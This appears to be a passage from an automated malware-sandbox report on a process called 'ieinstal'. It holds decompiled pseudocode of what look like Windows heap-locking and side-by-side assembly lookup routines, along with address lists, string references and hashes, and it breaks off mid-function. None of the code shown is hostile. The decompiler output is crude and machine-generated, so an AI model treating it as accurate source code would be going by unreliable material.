					_t80 = _t82;
					if(_t80 == 0 &&  *_t104 != _t80) {
						_push( *_t104);
						_t80 = E1F002A80();
					}
					goto L9;
				}
				_t84 =  *((intOrPtr*)(_t104 + 4));
				if(_t84 != 0) {
					if(_t84 != 1) {
						_t109 =  *_t104;
						_t80 = _t84 + 0xfffffffe;
						_v608 = _t109;
						_v584 = 0;
						_v596 = _t80;
						if(_t109 == 0) {
							L33:
							 *((char*)(_t104 + 9)) = 1;
							goto L9;
						}
						_push( &_v584);
						_push(0x220);
						_t115 =  &_v556;
						_push( &_v556);
						_push(0);
						_push(_t80);
						_push(_t109);
						_t80 = E1F002CD0();
						_v624 = _t80;
						if(_t80 >= 0) {
							_t80 = _v544;
							if(_t80 > 0xfffe) {
								L20:
								 *((char*)(_t104 + 8)) = 1;
								if(_t126 != 0) {
									 *_t126 = 0xc0000106;
								}
								goto L9;
							}
							_t115 =  &_v592;
							_v592 = _t80;
							_v590 = _t80;
							_v588 =  &_v540;
							_t80 = E1F04E222(_v608,  &_v592, _t104 + 0xc);
							_v612 = _t80;
							if(_t80 >= 0) {
								goto L9;
							}
							_push(_t80);
							_t80 = E1F04EF10(0x33, 0, "SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx\n",  &_v592);
							 *((char*)(_t104 + 8)) = 1;
							goto L36;
						}
						if(_t80 == 0x8000001a) {
							goto L33;
						}
						_push(_t80);
						_t80 = E1F04EF10(0x33, 0, "SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx\n", _v596);
						_t133 = _t133 + 0x14;
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 == 0) {
							goto L9;
						}
						_t80 = _v600;
						goto L38;
					}
					E1F005050(_t106,  &_v608, E1EFD01C0());
					_t115 = _v616 & 0x0000ffff;
					 *(_t104 + 0xc) = 0;
					_t27 = _t115 + 0x10; // 0x50
					_t80 = _t27;
					if(_t27 > ( *(_t104 + 0xe) & 0x0000ffff)) {
						L22:
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 != 0) {
							 *_t126 = 0xc0000023;
						}
						goto L9;
					}
					E1F0088C0( *((intOrPtr*)(_t104 + 0x10)), _v604, _t115);
					_t133 = _t133 + 0xc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t80 = _v608 + 0x10;
					L8:
					 *(_t104 + 0xc) = _t80;
					goto L9;
				}
				_t80 =  *( *[fs:0x30] + 0x10);
				_t123 =  *( *( *[fs:0x30] + 0x10) + 0x38) & 0x0000ffff;
				_v596 = _t123;
				_t112 = _t123 + 0x10;
				if(_t112 > 0xfffe) {
					goto L20;
				}
				_t80 =  *(_t104 + 0xe) & 0x0000ffff;
				if(_t112 > ( *(_t104 + 0xe) & 0x0000ffff)) {
					goto L22;
				}
				_t113 =  *((intOrPtr*)( *( *[fs:0x30] + 0x10) + 0x3c));
				if(( *( *( *[fs:0x30] + 0x10) + 8) & 0x00000001) == 0) {
					_t113 = _t113 +  *( *[fs:0x30] + 0x10);
				}
				E1F0088C0( *((intOrPtr*)(_t104 + 0x10)), _t113, _t123);
				_t133 = _t133 + 0xc;
				_t115 = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t104 + 0xc) = _v596 + 0xe;
				if(E1EFF3194( *((intOrPtr*)(_t104 + 0x10)), 1) != 0) {
					goto L9;
				} else {
					_t80 = 0;
					goto L8;
				}
			}

0x1eff2c18
0x1eff2c25
0x1eff2c30
0x1eff2c34
0x1eff2c38
0x1eff2c3b
0x1eff2d62
0x1eff2d6a
0x1eff2d6d
0x1eff2d75
0x1eff2d7b
0x1eff2d7f
0x1eff2d80
0x1eff2d84
0x1eff2d8c
0x1eff2d90
0x1eff2d94
0x1eff2d99
0x1eff2d9f
0x1eff2dac
0x1eff2db0
0x1eff2db4
0x1f0325a0
0x1f0325a0
0x1f0325ae
0x1f0325b3
0x1f0325b7
0x1f0325b7
0x1f0325bc
0x1eff2cd8
0x1eff2cdf
0x1eff2ce0
0x1eff2ce1
0x1eff2cec
0x1eff2cec
0x1f0325c2
0x1f0325c6
0x1f0325c6
0x1f0325c6
0x00000000
0x1eff2d9f
0x1eff2c41
0x1eff2c44
0x1eff2cf0
0x1eff2cf3
0x1f03247e
0x1f032480
0x1f032480
0x00000000
0x1eff2cf3
0x1eff2c4a
0x1eff2c4f
0x1eff2d01
0x1f0324c6
0x1f0324ca
0x1f0324cd
0x1f0324d1
0x1f0324d5
0x1f0324db
0x1f03258c
0x1f03258c
0x00000000
0x1f03258c
0x1f0324e5
0x1f0324e6
0x1f0324eb
0x1f0324ef
0x1f0324f0
0x1f0324f1
0x1f0324f2
0x1f0324f3
0x1f0324f8
0x1f0324fe
0x1f032535
0x1f03253e
0x1f03248a
0x1f03248a
0x1f032490
0x1f032496
0x1f032496
0x00000000
0x1f032490
0x1f032548
0x1f03254c
0x1f032551
0x1f03255a
0x1f032562
0x1f032567
0x1f03256d
0x00000000
0x00000000
0x1f032573
0x1f032581
0x1f032586
0x00000000
0x1f032586
0x1f032505
0x00000000
0x00000000
0x1f03250b
0x1f032518
0x1f03251d
0x1f032520
0x1f032526
0x00000000
0x00000000
0x1f03252c
0x00000000
0x1f03252c
0x1eff2d12
0x1eff2d17
0x1eff2d22
0x1eff2d26
0x1eff2d26
0x1eff2d2b
0x1f0324a1
0x1f0324a1
0x1f0324a7
0x1f0324ad
0x1f0324ad
0x00000000
0x1f0324a7
0x1eff2d39
0x1eff2d4b
0x1eff2d4e
0x1eff2d4f
0x1eff2d50
0x1eff2d51
0x1eff2d56
0x1eff2cd4
0x1eff2cd4
0x00000000
0x1eff2cd4
0x1eff2c5b
0x1eff2c5e
0x1eff2c62
0x1eff2c66
0x1eff2c6f
0x00000000
0x00000000
0x1eff2c75
0x1eff2c7b
0x00000000
0x00000000
0x1eff2c8a
0x1eff2c9a
0x1f0324be
0x1f0324be
0x1eff2ca6
0x1eff2cb6
0x1eff2cbc
0x1eff2cbe
0x1eff2cbf
0x1eff2cc0
0x1eff2cc1
0x1eff2cc5
0x1eff2cd0
0x00000000
0x1eff2cd2
0x1eff2cd2
0x00000000
0x1eff2cd2

Strings

SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 1F0325A6
\WinSxS\, xrefs: 1EFF2D43
SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 1F032579
SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 1F032510
@, xrefs: 1EFF2D6D
.Local\, xrefs: 1EFF2CB1

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
API String ID: 0-3926108909
Opcode ID: 843b3bbca3a3bbce9f6ebcfd3bed3388e6375245b132f830bef70c67b0a69a7e
Instruction ID: 74552eafbb9114747b3dcce81cd962fbd8c4bf2759082362823e92ac5c6d3518
Opcode Fuzzy Hash: 843b3bbca3a3bbce9f6ebcfd3bed3388e6375245b132f830bef70c67b0a69a7e
Instruction Fuzzy Hash: 8881DC76604341DFE711CF14C8A0A5BB7E4AF85B10F418A5DFC948B361E771E944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1F044BC0 Relevance: 6.5, Strings: 5, Instructions: 246
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1F044BC0(signed short* _a4, signed int* _a8, short* _a12) {
				unsigned int _v8;
				void* _v12;
				signed short _v16;
				unsigned int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed short* _t85;
				unsigned int _t86;
				signed short _t99;
				short* _t108;
				signed int _t110;
				signed int _t112;
				signed int _t129;
				signed short _t131;
				signed int _t132;
				signed short _t134;
				short* _t143;
				signed int _t147;
				signed int _t149;
				unsigned int _t150;
				void* _t152;
				void* _t153;
				signed short _t154;
				signed int _t155;
				signed int* _t158;
				short* _t159;
				signed short* _t160;
				unsigned int _t166;
				signed short _t167;
				signed int _t169;
				unsigned int _t170;
				signed int _t172;
				signed short _t176;
				intOrPtr _t177;
				unsigned int _t178;
				unsigned int _t180;
				signed int _t183;
				void* _t184;
				signed int _t186;
				void* _t187;
				void* _t188;

				_t85 = _a4;
				_t149 = 0;
				_v40 = 0;
				_t176 =  *_t85 & 0x0000ffff;
				_t154 = _t85[2];
				_t86 = _t176 & 0x0000ffff;
				_v16 = _t154;
				_v24 = 0;
				_v20 = _t176;
				_v12 = 0x5c;
				_v28 = 0x2f;
				_t170 = _t86;
				if(_t86 == 0) {
					L11:
					_v20 = 0;
					_v44 = 0;
					asm("sbb eax, eax");
					_v36 = ( ~_t149 & 0xfffffff8) + 8;
					_v8 = _t170 - (_v16 - _t154 & 0xfffffffe);
					_t172 =  *0x1f0b4ff4; // 0x0
					if(_t172 != 0) {
						_t155 =  *0x1f0b4ff0 & 0x0000ffff;
						_t150 = 0;
						_v20 = _v12;
						if(_t155 == 0) {
							L32:
							_t166 = _v8;
							L33:
							_t59 = _t166 + 2; // 0x2
							_t99 = _v36 + 0xe + _t150 + _v20 + _t59;
							_v32 = _t99;
							if(_t99 > 0xfffe) {
								L22:
								return 0xc0000106;
							}
							_t177 = E1EFD5D60(_t99 & 0x0000ffff);
							_v36 = _t177;
							if(_t177 != 0) {
								E1F0088C0(_t177, _t172, _t150);
								_t188 = _t187 + 0xc;
								_t152 = _t177 + (_t150 >> 1) * 2;
								_t178 = _v20;
								if(_t178 != 0) {
									E1F0088C0(_t152, L"\\microsoft.system.package.metadata\\Application", _t178);
									_t188 = _t188 + 0xc;
									_t152 = _t152 + (_t178 >> 1) * 2;
								}
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t180 = _v8;
								 *((short*)(_t152 + 0xc)) = _v12;
								_t153 = _t152 + 0xe;
								E1F0088C0(_t153, _v16, _t180);
								_t108 = _t153 + (_t180 >> 1) * 2;
								if(_v24 != 0) {
									 *_t108 = 0;
								} else {
									asm("movsd");
									asm("movsd");
									asm("movsw");
								}
								_t158 = _a8;
								_t167 = _v44;
								_t158[1] = _v40;
								_t110 = _t167 & 0x0000ffff;
								_t158[0] = _t110;
								 *_t158 = _t110;
								if(_t167 != 0) {
									 *_t158 = _t110 + 0xfffffffe;
								}
								_t159 = _a12;
								 *((intOrPtr*)(_t159 + 4)) = _v36;
								_t112 = _v32 & 0x0000ffff;
								 *(_t159 + 2) = _t112;
								 *_t159 = _t112 + 0xfffffffe;
								return 0;
							}
							L35:
							return 0xc0000017;
						}
						while( *((short*)(_t172 + (_t150 >> 1) * 2)) != 0x3b) {
							_t150 = _t150 + 2;
							if(_t150 < _t155) {
								continue;
							}
							goto L32;
						}
						goto L32;
					}
					_t150 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff;
					_t172 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c);
					_v32 = _t172;
					if(( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00000001) == 0) {
						_t172 = _t172 +  *((intOrPtr*)( *[fs:0x30] + 0x10));
						_v32 = _t172;
					}
					_t160 = _t172 + ((_t150 >> 1) - 1) * 2;
					_t129 = _t172;
					while(_t160 > _t172) {
						_t169 =  *_t160 & 0x0000ffff;
						if(_t169 == _v12 || _t169 == _v28) {
							_t129 =  &(_t160[1]);
							L21:
							_t131 = _t129 - _t172 & 0xfffffffe;
							if(_t131 <= 0xfffe) {
								_t132 = _t131 & 0x0000ffff;
								_v28 = _t132;
								if(_t176 > 0xfffc) {
									goto L22;
								}
								_t134 = _t132 + _v36 + _v8 + 2;
								if(_t134 > 0xfffe) {
									goto L22;
								}
								_v44 = _t134 & 0x0000ffff;
								_t183 = E1EFD5D60(_t134 & 0x0000ffff);
								_v40 = _t183;
								if(_t183 == 0) {
									goto L35;
								}
								E1F0088C0(_t183, _t172, _v28);
								_t184 = _t183 + (_v28 >> 1) * 2;
								E1F0088C0(_t184, _v16, _v8);
								_t166 = _v8;
								_t187 = _t187 + 0x18;
								_t143 = _t184 + (_t166 >> 1) * 2;
								if(_v24 != 0) {
									 *_t143 = 0;
								} else {
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t172 = _v32;
								}
								goto L33;
							}
							goto L22;
						} else {
							_t160 = _t160 - 2;
							continue;
						}
					}
					goto L21;
				}
				_t147 = _t154 + ((_t86 >> 1) - 1) * 2;
				if(_t147 <= _t154) {
					goto L11;
				} else {
					goto L2;
				}
				do {
					L2:
					_t186 =  *_t147 & 0x0000ffff;
					if(_t186 != 0x2e) {
						if(_t186 == _v12 || _t186 == _v28) {
							_v16 = _t147 + 2;
							L10:
							_t176 = _v20;
							goto L11;
						} else {
							goto L7;
						}
					} else {
						if(_t149 == 0) {
							_t149 = _t147;
							_v24 = _t149;
						}
					}
					L7:
					_t147 = _t147 - 2;
				} while (_t147 > _t154);
				goto L10;
			}

0x1f044bc8
0x1f044bcf
0x1f044bd1
0x1f044bd4
0x1f044bd7
0x1f044bda
0x1f044bdd
0x1f044be0
0x1f044be3
0x1f044be6
0x1f044bed
0x1f044bf5
0x1f044bfa
0x1f044c37
0x1f044c39
0x1f044c3e
0x1f044c41
0x1f044c49
0x1f044c56
0x1f044c59
0x1f044c61
0x1f044d5e
0x1f044d65
0x1f044d6a
0x1f044d6f
0x1f044d83
0x1f044d83
0x1f044d86
0x1f044d89
0x1f044d94
0x1f044d96
0x1f044d9e
0x1f044cd1
0x00000000
0x1f044cd1
0x1f044dad
0x1f044daf
0x1f044db4
0x1f044dc3
0x1f044dca
0x1f044dcd
0x1f044dd0
0x1f044dd5
0x1f044dde
0x1f044de3
0x1f044de8
0x1f044de8
0x1f044df5
0x1f044df6
0x1f044df7
0x1f044df8
0x1f044dff
0x1f044e03
0x1f044e07
0x1f044e17
0x1f044e1a
0x1f044e2b
0x1f044e1c
0x1f044e23
0x1f044e24
0x1f044e25
0x1f044e25
0x1f044e2e
0x1f044e34
0x1f044e37
0x1f044e3a
0x1f044e3d
0x1f044e41
0x1f044e46
0x1f044e4b
0x1f044e4b
0x1f044e4e
0x1f044e57
0x1f044e5a
0x1f044e5d
0x1f044e64
0x00000000
0x1f044e67
0x1f044db6
0x00000000
0x1f044db6
0x1f044d71
0x1f044d7c
0x1f044d81
0x00000000
0x00000000
0x00000000
0x1f044d81
0x00000000
0x1f044d71
0x1f044c70
0x1f044c7d
0x1f044c86
0x1f044c90
0x1f044c98
0x1f044c9b
0x1f044c9b
0x1f044ca3
0x1f044ca6
0x1f044cbc
0x1f044caa
0x1f044cb1
0x1f044cc2
0x1f044cc5
0x1f044cc7
0x1f044ccf
0x1f044ce0
0x1f044ce3
0x1f044ce9
0x00000000
0x00000000
0x1f044cf4
0x1f044cfb
0x00000000
0x00000000
0x1f044d01
0x1f044d09
0x1f044d0b
0x1f044d10
0x00000000
0x00000000
0x1f044d1b
0x1f044d2b
0x1f044d2f
0x1f044d34
0x1f044d37
0x1f044d42
0x1f044d45
0x1f044d59
0x1f044d47
0x1f044d4e
0x1f044d4f
0x1f044d50
0x1f044d52
0x1f044d52
0x00000000
0x1f044d45
0x00000000
0x1f044cb9
0x1f044cb9
0x00000000
0x1f044cb9
0x1f044cb1
0x00000000
0x1f044cc0
0x1f044bff
0x1f044c04
0x00000000
0x00000000
0x00000000
0x00000000
0x1f044c06
0x1f044c06
0x1f044c06
0x1f044c0c
0x1f044c1d
0x1f044c31
0x1f044c34
0x1f044c34
0x00000000
0x00000000
0x00000000
0x00000000
0x1f044c0e
0x1f044c10
0x1f044c12
0x1f044c14
0x1f044c14
0x1f044c10
0x1f044c25
0x1f044c25
0x1f044c28
0x00000000

Strings

/, xrefs: 1F044BED
\microsoft.system.package.metadata\Application, xrefs: 1F044DD8
\, xrefs: 1F044BE6
.DLL, xrefs: 1F044D47, 1F044E1C
.Local, xrefs: 1F044DF0

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: 3a0e373c49fcad162288106eb6c7a38ec8ba00710195b8cb950fdbb91c89d427
Instruction ID: 2ef7683ed5df52eeb8ded82151ad94344d51a66da1976ec2eeeed01a0448bc08
Opcode Fuzzy Hash: 3a0e373c49fcad162288106eb6c7a38ec8ba00710195b8cb950fdbb91c89d427
Instruction Fuzzy Hash: 93918179E006199BCB11CF69C881AAEB7F5FF48710F6A416AEC14EB350E775A901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEDA20 Relevance: 6.4, Strings: 5, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E1EFEDA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					L1F089335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1F07F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x1f0b376c; // 0x0
					 *0x1f0b91e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1EFBB910();
					} else {
						E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1EFBB910("Invalid heap signature for heap at %p", _t93);
					E1EFBB910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E1EFBB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1f0b47a1 = 1;
						asm("int3");
						 *0x1f0b47a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E1F05AA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E1EFEFEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E1EFEBAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E1EFEF300(_t92, _t74);
					}
				}
				goto L6;
			}

0x1efeda2a
0x1efeda35
0x1f02f408
0x1efeda90
0x1efeda96
0x1efeda9b
0x1f02f510
0x00000000
0x00000000
0x1f02f51f
0x1efedaa6
0x1efedaa9
0x1f02f537
0x1f02f53f
0x1f02f53f
0x1f02f537
0x00000000
0x1efedaaf
0x1efedaa1
0x1efedaa1
0x00000000
0x1efedaa1
0x1efeda42
0x1f02f413
0x1f02f41b
0x00000000
0x1f02f421
0x1efeda4f
0x1f02f432
0x1f02f451
0x1f02f456
0x1f02f434
0x1f02f449
0x1f02f44e
0x1f02f462
0x1f02f471
0x1f02f476
0x1f02f47b
0x1f02f48d
0x1f02f48f
0x1f02f496
0x1f02f497
0x1f02f497
0x00000000
0x1f02f49e
0x1efeda59
0x00000000
0x00000000
0x1efeda5b
0x1efeda66
0x1efeda6d
0x1efeda6d
0x1efeda71
0x00000000
0x00000000
0x1efeda73
0x1efeda77
0x1efeda7f
0x1efeda80
0x1efeda84
0x1efeda8a
0x1f02f4a8
0x1f02f4ab
0x1f02f4ab
0x1f02f4b0
0x1f02f4b3
0x1f02f4b8
0x1f02f4c1
0x1f02f4c1
0x1f02f4c4
0x1f02f4c8
0x1f02f4cb
0x1f02f4ce
0x1f02f4d5
0x1f02f4d8
0x1f02f4db
0x1f02f4e1
0x00000000
0x00000000
0x1f02f4e7
0x1f02f4ec
0x1f02f4ec
0x1f02f4f0
0x1f02f4f3
0x1f02f4f9
0x1f02f503
0x1f02f503
0x1f02f4f9
0x00000000

Strings

Invalid heap signature for heap at %p, xrefs: 1F02F45D
HEAP: , xrefs: 1F02F451
HEAP[%wZ]: , xrefs: 1F02F444
, passed to %s, xrefs: 1F02F46C
RtlUnlockHeap, xrefs: 1F02F467

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 0-3224558752
Opcode ID: ae15ed1699c229819a6d7a43a9709686c45f9ec8a24abd7db05c4b04e721ba3b
Instruction ID: 4872a9c2c71571aa081c997ca3910f8f0f449027c8deea1806d91fd638497d80
Opcode Fuzzy Hash: ae15ed1699c229819a6d7a43a9709686c45f9ec8a24abd7db05c4b04e721ba3b
Instruction Fuzzy Hash: CD414735A00685DFD711DF28C4A4B9AB3E4EF40765F004A6DEC069BBD1C779BA81C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEDAC0 Relevance: 6.3, Strings: 5, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E1EFEDAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E1F089109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1F07F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x1f0b3768; // 0x0
					 *0x1f0b91e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1EFBB910();
					} else {
						E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1EFBB910("Invalid heap signature for heap at %p", _t53);
					E1EFBB910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E1EFBB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1f0b47a1 = 1;
						asm("int3");
						 *0x1f0b47a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E1EFCFED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}

0x1efedac8
0x1efedacb
0x1efedad6
0x1f02f54e
0x1efedb0e
0x1efedb14
0x1efedb19
0x1f02f5ee
0x00000000
0x00000000
0x1f02f5fd
0x1efedb24
0x1efedb27
0x1f02f614
0x1f02f61c
0x1f02f61c
0x1f02f614
0x1efedb2d
0x1efedb2f
0x1efedb31
0x1efedb31
0x1efedb1f
0x1efedb1f
0x00000000
0x1efedb1f
0x1efedae3
0x1f02f559
0x1f02f561
0x1f02f567
0x00000000
0x1f02f567
0x1efedaf0
0x1f02f578
0x1f02f597
0x1f02f59c
0x1f02f57a
0x1f02f58f
0x1f02f594
0x1f02f5a8
0x1f02f5b7
0x1f02f5bc
0x1f02f5c1
0x1f02f5d3
0x1f02f5d5
0x1f02f5dc
0x1f02f5dd
0x1f02f5dd
0x1f02f5e4
0x00000000
0x1efedaf6
0x1efedafa
0x1efedb02
0x1efedb07
0x1efedb07
0x00000000
0x1efedafa

Strings

Invalid heap signature for heap at %p, xrefs: 1F02F5A3
HEAP: , xrefs: 1F02F597
HEAP[%wZ]: , xrefs: 1F02F58A
, passed to %s, xrefs: 1F02F5B2
RtlLockHeap, xrefs: 1F02F5AD

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 0-1222099010
Opcode ID: 5a8b0ef5c39f1494dc0aafe9e110c7eb724eed0aa6a8342b5b52ffb499cda026
Instruction ID: c9a61b9e396b6b8a5398678e08ccb715117f1dc58887537ee7565ce12ce02ee6
Opcode Fuzzy Hash: 5a8b0ef5c39f1494dc0aafe9e110c7eb724eed0aa6a8342b5b52ffb499cda026
Instruction Fuzzy Hash: 1F3138366107D8EFEB21DB28C829B8977E4EF01660F014A89EC424BA91D776B941C761

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD6FE0 Relevance: 6.0, Strings: 3, Instructions: 2248
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1EFD6FE0(signed char __ecx, signed int __edx, signed int _a4, unsigned int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed short _v48;
				char _v49;
				signed int _v56;
				char _v57;
				char _v58;
				signed char _v59;
				char _v60;
				char _v61;
				signed int _v68;
				signed int _v72;
				signed short _v76;
				signed int _v80;
				signed short _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed short _v100;
				signed int _v104;
				signed int _v108;
				char _v109;
				signed short _v110;
				char _v111;
				signed int _v116;
				signed int _v120;
				signed char _v124;
				signed int _v128;
				signed short _v130;
				signed short _v132;
				signed short _v134;
				signed short _v136;
				signed int _v140;
				signed short _v144;
				signed short _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				short* _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed short _v196;
				unsigned int* _v200;
				intOrPtr _v204;
				signed int _v208;
				signed short _v212;
				signed int _v216;
				signed int _v220;
				signed char _v224;
				unsigned int* _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				char _v256;
				intOrPtr _v260;
				signed int* _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed short _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
